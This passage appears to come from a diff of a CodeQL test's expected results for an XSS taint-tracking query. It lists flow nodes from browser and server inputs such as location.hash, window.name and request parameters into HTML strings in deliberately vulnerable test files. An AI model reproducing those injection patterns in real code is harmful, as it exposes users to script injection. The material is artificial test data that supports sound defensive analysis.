ams.foo | +| angular2-client.ts:27:44:27:74 | this.ro ... yParams | semmle.label | this.ro ... yParams | +| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:28:44:28:71 | this.ro ... ragment | semmle.label | this.ro ... ragment | +| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | +| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | +| angular2-client.ts:32:46:32:59 | map.get('foo') | semmle.label | map.get('foo') | +| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | semmle.label | this.ro ... 1].path | +| angular2-client.ts:36:44:36:80 | this.ro ... ameters | semmle.label | this.ro ... ameters | +| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | semmle.label | this.ro ... eters.x | +| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | semmle.label | this.ro ... et('x') | +| angular2-client.ts:38:44:38:89 | this.ro ... .params | semmle.label | this.ro ... .params | +| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | semmle.label | this.ro ... arams.x | +| angular2-client.ts:40:44:40:58 | this.router.url | semmle.label | this.router.url | +| angular2-client.ts:42:45:42:59 | this.router.url | semmle.label | this.router.url | +| angular2-client.ts:43:75:43:105 | this.ro ... yParams | semmle.label | this.ro ... yParams | +| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | semmle.label | routeSn ... ('foo') | +| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | semmle.label | Cookie.get("unsafe") | +| angular-tempate-url.js:13:30:13:31 | ev | semmle.label | ev | +| angular-tempate-url.js:14:26:14:27 | ev | semmle.label | ev | +| angular-tempate-url.js:14:26:14:32 | ev.data | semmle.label | ev.data | +| classnames.js:7:31:7:84 | `` | semmle.label | `` | +| classnames.js:7:47:7:69 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:7:58:7:68 | window.name | semmle.label | window.name | +| classnames.js:8:31:8:85 | `` | semmle.label | `` | +| classnames.js:8:47:8:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:8:59:8:69 | window.name | semmle.label | window.name | +| classnames.js:9:31:9:85 | `` | semmle.label | `` | +| classnames.js:9:47:9:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:9:59:9:69 | window.name | semmle.label | window.name | +| classnames.js:10:45:10:55 | window.name | semmle.label | window.name | +| classnames.js:11:31:11:79 | `` | semmle.label | `` | +| classnames.js:11:47:11:64 | unsafeStyle('foo') | semmle.label | unsafeStyle('foo') | +| classnames.js:13:31:13:83 | `` | semmle.label | `` | +| classnames.js:13:47:13:68 | safeSty ... w.name) | semmle.label | safeSty ... w.name) | +| classnames.js:13:57:13:67 | window.name | semmle.label | window.name | +| classnames.js:15:31:15:78 | `` | semmle.label | `` | +| classnames.js:15:47:15:63 | clsx(window.name) | semmle.label | clsx(window.name) | +| classnames.js:15:52:15:62 | window.name | semmle.label | window.name | +| classnames.js:17:32:17:79 | `` | semmle.label | `` | +| classnames.js:17:48:17:64 | clsx(window.name) | semmle.label | clsx(window.name) | +| classnames.js:17:53:17:63 | window.name | semmle.label | window.name | +| clipboard.ts:8:11:8:51 | html | semmle.label | html | +| clipboard.ts:8:18:8:51 | clipboa ... /html') | semmle.label | clipboa ... /html') | +| clipboard.ts:15:25:15:28 | html | semmle.label | html | +| clipboard.ts:24:23:24:58 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:29:19:29:54 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:33:19:33:68 | e.origi ... /html') | semmle.label | e.origi ... /html') | +| clipboard.ts:43:15:43:55 | html | semmle.label | html | +| clipboard.ts:43:22:43:55 | clipboa ... /html') | semmle.label | clipboa ... /html') | +| clipboard.ts:50:29:50:32 | html | semmle.label | html | +| clipboard.ts:71:13:71:62 | droppedHtml | semmle.label | droppedHtml | +| clipboard.ts:71:27:71:62 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | +| clipboard.ts:98:15:98:54 | html | semmle.label | html | +| clipboard.ts:98:22:98:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| clipboard.ts:99:23:99:26 | html | semmle.label | html | +| custom-element.js:5:26:5:36 | window.name | semmle.label | window.name | +| d3.js:4:12:4:22 | window.name | semmle.label | window.name | +| d3.js:11:15:11:24 | getTaint() | semmle.label | getTaint() | +| d3.js:12:20:12:29 | getTaint() | semmle.label | getTaint() | +| d3.js:14:20:14:29 | getTaint() | semmle.label | getTaint() | +| d3.js:21:15:21:24 | getTaint() | semmle.label | getTaint() | +| dates.js:9:9:9:69 | taint | semmle.label | taint | +| dates.js:9:17:9:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:9:36:9:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:9:36:9:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:11:31:11:70 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:11:42:11:68 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:11:63:11:67 | taint | semmle.label | taint | +| dates.js:12:31:12:73 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:12:42:12:71 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:12:66:12:70 | taint | semmle.label | taint | +| dates.js:13:31:13:72 | `Time i ... time)}` | semmle.label | `Time i ... time)}` | +| dates.js:13:42:13:70 | dateFns ... )(time) | semmle.label | dateFns ... )(time) | +| dates.js:13:59:13:63 | taint | semmle.label | taint | +| dates.js:16:31:16:69 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:16:42:16:67 | moment( ... (taint) | semmle.label | moment( ... (taint) | +| dates.js:16:62:16:66 | taint | semmle.label | taint | +| dates.js:18:31:18:66 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:18:42:18:64 | datefor ... taint) | semmle.label | datefor ... taint) | +| dates.js:18:59:18:63 | taint | semmle.label | taint | +| dates.js:21:31:21:68 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:21:42:21:66 | dayjs(t ... (taint) | semmle.label | dayjs(t ... (taint) | +| dates.js:21:61:21:65 | taint | semmle.label | taint | +| dates.js:30:9:30:69 | taint | semmle.label | taint | +| dates.js:30:17:30:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:30:36:30:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:30:36:30:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:37:31:37:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:37:42:37:82 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:37:77:37:81 | taint | semmle.label | taint | +| dates.js:38:31:38:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:38:42:38:82 | luxon.f ... taint) | semmle.label | luxon.f ... taint) | +| dates.js:38:77:38:81 | taint | semmle.label | taint | +| dates.js:39:31:39:86 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:39:42:39:84 | moment. ... taint) | semmle.label | moment. ... taint) | +| dates.js:39:79:39:83 | taint | semmle.label | taint | +| dates.js:40:31:40:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:40:42:40:82 | dayjs.f ... taint) | semmle.label | dayjs.f ... taint) | +| dates.js:40:77:40:81 | taint | semmle.label | taint | +| dates.js:46:9:46:69 | taint | semmle.label | taint | +| dates.js:46:17:46:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:46:36:46:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:46:36:46:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:48:31:48:90 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:48:42:48:88 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | +| dates.js:48:83:48:87 | taint | semmle.label | taint | +| dates.js:49:31:49:89 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:49:42:49:87 | new Dat ... (taint) | semmle.label | new Dat ... (taint) | +| dates.js:49:82:49:86 | taint | semmle.label | taint | +| dates.js:50:31:50:104 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:50:42:50:102 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | +| dates.js:50:97:50:101 | taint | semmle.label | taint | +| dates.js:54:9:54:69 | taint | semmle.label | taint | +| dates.js:54:17:54:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:54:36:54:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:54:36:54:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:57:31:57:101 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:57:42:57:99 | moment. ... (taint) | semmle.label | moment. ... (taint) | +| dates.js:57:94:57:98 | taint | semmle.label | taint | +| dates.js:59:31:59:87 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:59:42:59:85 | luxon.e ... (taint) | semmle.label | luxon.e ... (taint) | +| dates.js:59:80:59:84 | taint | semmle.label | taint | +| dates.js:61:31:61:88 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:61:42:61:86 | dayjs.s ... (taint) | semmle.label | dayjs.s ... (taint) | +| dates.js:61:81:61:85 | taint | semmle.label | taint | +| dragAndDrop.ts:8:11:8:50 | html | semmle.label | html | +| dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| dragAndDrop.ts:15:25:15:28 | html | semmle.label | html | +| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | semmle.label | e.origi ... /html') | +| dragAndDrop.ts:43:15:43:54 | html | semmle.label | html | +| dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| dragAndDrop.ts:50:29:50:32 | html | semmle.label | html | +| dragAndDrop.ts:71:13:71:61 | droppedHtml | semmle.label | droppedHtml | +| dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | +| dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | +| event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | +| event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| jquery.js:2:7:2:40 | tainted | semmle.label | tainted | +| jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | +| jquery.js:4:5:4:11 | tainted | semmle.label | tainted | +| jquery.js:5:13:5:19 | tainted | semmle.label | tainted | +| jquery.js:6:11:6:17 | tainted | semmle.label | tainted | +| jquery.js:7:5:7:34 | "
    " | semmle.label | "
    " | +| jquery.js:7:20:7:26 | tainted | semmle.label | tainted | +| jquery.js:8:18:8:34 | "XSS: " + tainted | semmle.label | "XSS: " + tainted | +| jquery.js:8:28:8:34 | tainted | semmle.label | tainted | +| jquery.js:10:5:10:40 | "" + ... "" | semmle.label | "" + ... "" | +| jquery.js:10:13:10:20 | location | semmle.label | location | +| jquery.js:10:13:10:31 | location.toString() | semmle.label | location.toString() | +| jquery.js:14:19:14:58 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| jquery.js:14:38:14:57 | window.location.hash | semmle.label | window.location.hash | +| jquery.js:15:19:15:60 | decodeU ... search) | semmle.label | decodeU ... search) | +| jquery.js:15:38:15:59 | window. ... .search | semmle.label | window. ... .search | +| jquery.js:16:19:16:64 | decodeU ... ring()) | semmle.label | decodeU ... ring()) | +| jquery.js:16:38:16:52 | window.location | semmle.label | window.location | +| jquery.js:16:38:16:63 | window. ... tring() | semmle.label | window. ... tring() | +| jquery.js:18:7:18:33 | hash | semmle.label | hash | +| jquery.js:18:14:18:33 | window.location.hash | semmle.label | window.location.hash | +| jquery.js:21:5:21:8 | hash | semmle.label | hash | +| jquery.js:21:5:21:21 | hash.substring(1) | semmle.label | hash.substring(1) | +| jquery.js:22:5:22:8 | hash | semmle.label | hash | +| jquery.js:22:5:22:25 | hash.su ... (1, 10) | semmle.label | hash.su ... (1, 10) | +| jquery.js:23:5:23:8 | hash | semmle.label | hash | +| jquery.js:23:5:23:18 | hash.substr(1) | semmle.label | hash.substr(1) | +| jquery.js:24:5:24:8 | hash | semmle.label | hash | +| jquery.js:24:5:24:17 | hash.slice(1) | semmle.label | hash.slice(1) | +| jquery.js:27:5:27:8 | hash | semmle.label | hash | +| jquery.js:27:5:27:25 | hash.re ... #', '') | semmle.label | hash.re ... #', '') | +| jquery.js:28:5:28:26 | window. ... .search | semmle.label | window. ... .search | +| jquery.js:28:5:28:43 | window. ... ?', '') | semmle.label | window. ... ?', '') | +| jquery.js:34:5:34:25 | '' + ... '' | semmle.label | '' + ... '' | +| jquery.js:34:13:34:16 | hash | semmle.label | hash | +| jquery.js:36:25:36:31 | tainted | semmle.label | tainted | +| jquery.js:37:25:37:37 | () => tainted | semmle.label | () => tainted | +| jquery.js:37:31:37:37 | tainted | semmle.label | tainted | +| json-stringify.jsx:5:9:5:36 | locale | semmle.label | locale | +| json-stringify.jsx:5:18:5:36 | req.param("locale") | semmle.label | req.param("locale") | +| json-stringify.jsx:11:51:11:56 | locale | semmle.label | locale | +| json-stringify.jsx:19:56:19:61 | locale | semmle.label | locale | +| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | semmle.label | JSON.st ... locale) | +| json-stringify.jsx:31:55:31:60 | locale | semmle.label | locale | +| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | semmle.label | JSON.st ... jsonLD) | +| jwt-server.js:7:9:7:35 | taint | semmle.label | taint | +| jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| jwt-server.js:9:16:9:20 | taint | semmle.label | taint | +| jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | +| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | +| nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | +| optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | +| optionalSanitizer.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| optionalSanitizer.js:6:18:6:23 | target | semmle.label | target | +| optionalSanitizer.js:8:7:8:22 | tainted | semmle.label | tainted | +| optionalSanitizer.js:8:17:8:22 | target | semmle.label | target | +| optionalSanitizer.js:9:18:9:24 | tainted | semmle.label | tainted | +| optionalSanitizer.js:15:9:15:14 | target | semmle.label | target | +| optionalSanitizer.js:16:18:16:18 | x | semmle.label | x | +| optionalSanitizer.js:17:20:17:20 | x | semmle.label | x | +| optionalSanitizer.js:26:7:26:39 | target | semmle.label | target | +| optionalSanitizer.js:26:16:26:39 | documen ... .search | semmle.label | documen ... .search | +| optionalSanitizer.js:28:24:28:24 | x | semmle.label | x | +| optionalSanitizer.js:29:12:29:12 | x | semmle.label | x | +| optionalSanitizer.js:31:7:31:23 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:31:18:31:23 | target | semmle.label | target | +| optionalSanitizer.js:32:18:32:25 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:34:5:34:36 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | semmle.label | sanitiz ... inted2) | +| optionalSanitizer.js:34:28:34:35 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:36:18:36:25 | tainted2 | semmle.label | tainted2 | +| optionalSanitizer.js:38:7:38:23 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:38:18:38:23 | target | semmle.label | target | +| optionalSanitizer.js:39:18:39:25 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:41:5:41:36 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | semmle.label | sanitiz ... inted3) | +| optionalSanitizer.js:41:28:41:35 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:43:18:43:25 | tainted3 | semmle.label | tainted3 | +| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | semmle.label | sanitiz ... target | +| optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | semmle.label | sanitizeBad(target) | +| optionalSanitizer.js:45:41:45:46 | target | semmle.label | target | +| optionalSanitizer.js:45:51:45:56 | target | semmle.label | target | +| pages/[id].jsx:3:30:3:35 | params [id] | semmle.label | params [id] | +| pages/[id].jsx:3:30:3:35 | params [q] | semmle.label | params [q] | +| pages/[id].jsx:5:9:5:14 | { id } | semmle.label | { id } | +| pages/[id].jsx:5:9:5:29 | id | semmle.label | id | +| pages/[id].jsx:5:18:5:29 | router.query | semmle.label | router.query | +| pages/[id].jsx:10:44:10:45 | id | semmle.label | id | +| pages/[id].jsx:13:44:13:49 | params [id] | semmle.label | params [id] | +| pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | +| pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | +| pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | semmle.label | {\\n ... e\\n } [id] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | semmle.label | {\\n ... e\\n } [q] | +| pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | +| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | +| pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | +| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | semmle.label | context ... r \|\| "" | +| react-native.js:7:7:7:33 | tainted | semmle.label | tainted | +| react-native.js:7:17:7:33 | req.param("code") | semmle.label | req.param("code") | +| react-native.js:8:18:8:24 | tainted | semmle.label | tainted | +| react-native.js:9:27:9:33 | tainted | semmle.label | tainted | +| react-use-context.js:10:22:10:32 | window.name | semmle.label | window.name | +| react-use-context.js:16:26:16:36 | window.name | semmle.label | window.name | +| react-use-router.js:8:21:8:32 | router.query | semmle.label | router.query | +| react-use-router.js:8:21:8:39 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:11:24:11:35 | router.query | semmle.label | router.query | +| react-use-router.js:11:24:11:42 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:23:43:23:54 | router.query | semmle.label | router.query | +| react-use-router.js:23:43:23:61 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-router.js:33:21:33:32 | router.query | semmle.label | router.query | +| react-use-router.js:33:21:33:39 | router.query.foobar | semmle.label | router.query.foobar | +| react-use-state.js:4:9:4:49 | state | semmle.label | state | +| react-use-state.js:4:38:4:48 | window.name | semmle.label | window.name | +| react-use-state.js:5:51:5:55 | state | semmle.label | state | +| react-use-state.js:9:9:9:43 | state | semmle.label | state | +| react-use-state.js:10:14:10:24 | window.name | semmle.label | window.name | +| react-use-state.js:11:51:11:55 | state | semmle.label | state | +| react-use-state.js:15:9:15:43 | state | semmle.label | state | +| react-use-state.js:15:10:15:14 | state | semmle.label | state | +| react-use-state.js:16:20:16:30 | window.name | semmle.label | window.name | +| react-use-state.js:17:51:17:55 | state | semmle.label | state | +| react-use-state.js:21:10:21:14 | state | semmle.label | state | +| react-use-state.js:22:14:22:17 | prev | semmle.label | prev | +| react-use-state.js:23:35:23:38 | prev | semmle.label | prev | +| react-use-state.js:25:20:25:30 | window.name | semmle.label | window.name | +| sanitiser.js:16:7:16:27 | tainted | semmle.label | tainted | +| sanitiser.js:16:17:16:27 | window.name | semmle.label | window.name | +| sanitiser.js:23:21:23:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:23:29:23:35 | tainted | semmle.label | tainted | +| sanitiser.js:30:21:30:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:30:29:30:35 | tainted | semmle.label | tainted | +| sanitiser.js:33:21:33:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:33:29:33:35 | tainted | semmle.label | tainted | +| sanitiser.js:38:21:38:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:38:29:38:35 | tainted | semmle.label | tainted | +| sanitiser.js:45:21:45:44 | '' + ... '' | semmle.label | '' + ... '' | +| sanitiser.js:45:29:45:35 | tainted | semmle.label | tainted | +| sanitiser.js:48:19:48:25 | tainted | semmle.label | tainted | +| sanitiser.js:48:19:48:46 | tainted ... /g, '') | semmle.label | tainted ... /g, '') | +| stored-xss.js:2:39:2:62 | documen ... .search | semmle.label | documen ... .search | +| stored-xss.js:3:35:3:58 | documen ... .search | semmle.label | documen ... .search | +| stored-xss.js:5:20:5:52 | session ... ssion') | semmle.label | session ... ssion') | +| stored-xss.js:8:20:8:48 | localSt ... local') | semmle.label | localSt ... local') | +| stored-xss.js:10:9:10:44 | href | semmle.label | href | +| stored-xss.js:10:16:10:44 | localSt ... local') | semmle.label | localSt ... local') | +| stored-xss.js:12:20:12:54 | "" | semmle.label | "" | +| stored-xss.js:12:35:12:38 | href | semmle.label | href | +| string-manipulations.js:3:16:3:32 | document.location | semmle.label | document.location | +| string-manipulations.js:4:16:4:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:5:16:5:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:5:16:5:47 | documen ... lueOf() | semmle.label | documen ... lueOf() | +| string-manipulations.js:6:16:6:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:6:16:6:43 | documen ... f.sup() | semmle.label | documen ... f.sup() | +| string-manipulations.js:7:16:7:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:7:16:7:51 | documen ... rCase() | semmle.label | documen ... rCase() | +| string-manipulations.js:8:16:8:37 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:8:16:8:48 | documen ... mLeft() | semmle.label | documen ... mLeft() | +| string-manipulations.js:9:16:9:58 | String. ... n.href) | semmle.label | String. ... n.href) | +| string-manipulations.js:9:36:9:57 | documen ... on.href | semmle.label | documen ... on.href | +| string-manipulations.js:10:16:10:45 | String( ... n.href) | semmle.label | String( ... n.href) | +| string-manipulations.js:10:23:10:44 | documen ... on.href | semmle.label | documen ... on.href | +| tainted-url-suffix-arguments.js:3:17:3:17 | y | semmle.label | y | +| tainted-url-suffix-arguments.js:6:22:6:22 | y | semmle.label | y | +| tainted-url-suffix-arguments.js:11:11:11:36 | url | semmle.label | url | +| tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | semmle.label | window.location.href | +| tainted-url-suffix-arguments.js:12:17:12:19 | url | semmle.label | url | +| tooltip.jsx:6:11:6:30 | source | semmle.label | source | +| tooltip.jsx:6:20:6:30 | window.name | semmle.label | window.name | +| tooltip.jsx:10:25:10:30 | source | semmle.label | source | +| tooltip.jsx:11:25:11:30 | source | semmle.label | source | +| tooltip.jsx:17:11:17:33 | provide [source] | semmle.label | provide [source] | +| tooltip.jsx:17:21:17:33 | props.provide [source] | semmle.label | props.provide [source] | +| tooltip.jsx:18:51:18:57 | provide [source] | semmle.label | provide [source] | +| tooltip.jsx:18:51:18:59 | provide() | semmle.label | provide() | +| tooltip.jsx:22:11:22:30 | source | semmle.label | source | +| tooltip.jsx:22:20:22:30 | window.name | semmle.label | window.name | +| tooltip.jsx:23:38:23:43 | source | semmle.label | source | +| translate.js:6:7:6:39 | target | semmle.label | target | +| translate.js:6:16:6:39 | documen ... .search | semmle.label | documen ... .search | +| translate.js:7:7:7:61 | searchParams | semmle.label | searchParams | +| translate.js:7:7:7:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:7:22:7:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| translate.js:7:42:7:47 | target | semmle.label | target | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | +| trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | +| trusted-types.js:3:62:3:62 | x | semmle.label | x | +| trusted-types.js:3:67:3:67 | x | semmle.label | x | +| trusted-types.js:4:20:4:30 | window.name | semmle.label | window.name | +| trusted-types.js:13:20:13:30 | window.name | semmle.label | window.name | +| tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | semmle.label | JSON.pa ... tr(1))) | +| tst3.js:2:23:2:74 | decodeU ... str(1)) | semmle.label | decodeU ... str(1)) | +| tst3.js:2:42:2:63 | window. ... .search | semmle.label | window. ... .search | +| tst3.js:2:42:2:73 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst3.js:4:25:4:28 | data | semmle.label | data | +| tst3.js:4:25:4:32 | data.src | semmle.label | data.src | +| tst3.js:5:26:5:29 | data | semmle.label | data | +| tst3.js:5:26:5:31 | data.p | semmle.label | data.p | +| tst3.js:7:32:7:35 | data | semmle.label | data | +| tst3.js:7:32:7:37 | data.p | semmle.label | data.p | +| tst3.js:9:37:9:40 | data | semmle.label | data | +| tst3.js:9:37:9:42 | data.p | semmle.label | data.p | +| tst3.js:10:38:10:41 | data | semmle.label | data | +| tst3.js:10:38:10:43 | data.p | semmle.label | data.p | +| tst.js:2:7:2:39 | target | semmle.label | target | +| tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
